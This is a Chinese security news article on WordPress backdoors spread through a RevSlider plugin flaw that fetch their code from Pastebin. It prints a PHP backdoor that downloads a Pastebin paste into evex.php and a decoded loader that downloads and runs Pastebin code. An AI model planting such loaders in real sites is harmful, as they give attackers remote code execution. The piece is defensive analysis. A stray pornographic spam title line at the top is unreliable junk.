压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

惡意軟件新玩法:隱匿在Pastebin上的后門

快速分享文本、代碼的網(wǎng)站Pastebin常常被黑客們用來(lái)分享自己的庫(kù)、竊取的數(shù)據(jù)和其他代碼,而現(xiàn)在它真的被用于黑客攻擊了。

安全研究人員曾發(fā)現(xiàn)黑客們通過(guò)Gmail 草稿、Evernote等平臺(tái)控制僵尸網(wǎng)絡(luò),而且近日又發(fā)現(xiàn)一個(gè)新玩法 :黑客利用流行的WordPress插件RevSlider的老版本漏洞傳播新的后門變種,使用Pastebin.com放置惡意軟件。下面就讓我們一起來(lái)看看黑客們的新創(chuàng)意吧。

另類后門

Sucuri公司近日發(fā)表了一篇博客,該博客詳細(xì)解釋了黑客是如何利用舊版本的RevSlider WordPress插件來(lái)傳播一種新型后門,而該后門利用Pastebin.com網(wǎng)站服務(wù)來(lái)托管惡意代碼文件。

20150316030515423

惡意軟件高級(jí)研究員Denis Sinegubko在博客中寫道:

“這或多或少可以算得上是一個(gè)典型的后門。它從遠(yuǎn)程服務(wù)器下載惡意代碼,并在受害網(wǎng)站上將這些惡意代碼保存到一個(gè)文件中,使其隨時(shí)可被執(zhí)行。不過(guò),比較有趣的一點(diǎn)是其遠(yuǎn)程服務(wù)器的選擇,黑客既沒(méi)將惡意代碼文件托管在自己的網(wǎng)站,也不是肉雞網(wǎng)站,而是在最受歡迎的Web應(yīng)用網(wǎng)站Pastebin.com上。”

攻擊者通過(guò)掃描目標(biāo)網(wǎng)站來(lái)尋找含有漏洞的RevSlider插件。一旦發(fā)現(xiàn),他們會(huì)利用RevSlider的另一個(gè)漏洞將后門代碼上傳到該網(wǎng)站。

if(array_keys($_GET)[0] == ‘up’){

$content = file_get_contents(“http://pastebin.com/raw.php?i=JK5r7NyS”);

if($content){unlink(‘evex.php’);

$fh2 = fopen(“evex.php”,’a’);

fwrite($fh2,$content);

fclose($fh2);

}}else{print “test”;}

關(guān)鍵后門代碼

這是一份稍微復(fù)雜點(diǎn)的后門樣本,是通過(guò)RevSlider漏洞上傳的:

20150316030549646

從截圖中你可以看到這段代碼將一段經(jīng)過(guò)Base64編碼的內(nèi)容注入WordPress核心文件wp-links-opml.php中的$temp變量。以下是經(jīng)過(guò)解密的$temp內(nèi)容:

20150316030620889

你可以看到它從Pastebin下載代碼并立即執(zhí)行。但這次只有當(dāng)攻擊者提供wp_nonce_once中的請(qǐng)求參數(shù),也就是Pastebin的文章ID時(shí)才會(huì)運(yùn)行。wp_nonce_once參數(shù)的使用使得管理員難以追蹤惡意代碼的具體地址(防止了網(wǎng)址被屏蔽),同時(shí)又增加了后門的靈活性———這樣它就能夠下載執(zhí)行任何Pastebin上的代碼——哪怕是那些一開始不存在的代碼————只需要向wp-links-opml.php提供ID就行了。

FathurFreakz編碼器

印度尼西亞黑客們有一款編碼器與Pastebin配合默契。名字叫做PHP Encryptor by Yogyakarta Black Hat 或者是 by FathurFreakz。在 Pastebin.com網(wǎng)站上粘帖創(chuàng)建PHP代碼,軟件就會(huì)加密那個(gè)Pastebin網(wǎng)址,生成混淆后的代碼:

20150316030741562

解密后:

function FathurFreakz($ct3){

xcurl(‘http://pastebin.com/download.php?i=’.code($ct3));

}

FathurFreakz(CODE);

這段代碼會(huì)下載執(zhí)行Pastebin上的代碼(使用xcurl函數(shù)),ID在CODE常量中,并且經(jīng)過(guò)加密。你可以看到另外一種Pastebin網(wǎng)址種類:download.php,基本上它跟raw.php一樣,但它提供HTTP頭,使得瀏覽器不會(huì)顯示內(nèi)容,而是直接以文件形式下載。

經(jīng)過(guò)解密的代碼(看起來(lái)他們超愛(ài)用Pastebin……):

20150316030832845

給站長(zhǎng)們敲響警鐘

黑客在實(shí)時(shí)攻擊的時(shí)候大規(guī)模利用Pastebin網(wǎng)站,這給網(wǎng)站管理員敲響了警鐘,提示他們要時(shí)刻維護(hù)網(wǎng)站的CMS(內(nèi)容管理系統(tǒng))以防止插件被惡意利用。

就在幾周前,一款新型針對(duì)WordPress的惡意軟件SoakSoak,其主要攻擊手段也是通過(guò)RevSlider的漏洞,上傳一個(gè)后門,然后對(duì)所有使用相同服務(wù)器的網(wǎng)站進(jìn)行感染。當(dāng)時(shí)SoakSoak攻陷了約10萬(wàn)個(gè)WordPress站。

文章來(lái)源:FreeBuf黑客與極客(FreeBuf.COM)

上一篇:小漏洞大影響:來(lái)看看希爾頓酒店官網(wǎng)的CSRF漏洞

下一篇:谷歌正為Gmail開發(fā)PGP端到端加密技術(shù)